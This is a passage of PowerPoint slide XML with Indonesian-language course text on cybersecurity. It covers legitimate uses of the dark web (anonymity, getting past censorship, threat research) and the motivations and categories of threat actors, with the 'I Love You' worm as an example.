              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelapor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jurnalis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rezim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>represif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Disensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Di negara-negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor Internet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerobos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontroversial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penelitian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akademis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelajahi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gelap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856740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Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termotivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keserakahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keingintahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikategorikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opportunistik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>varian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> worm email "I Love You" yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
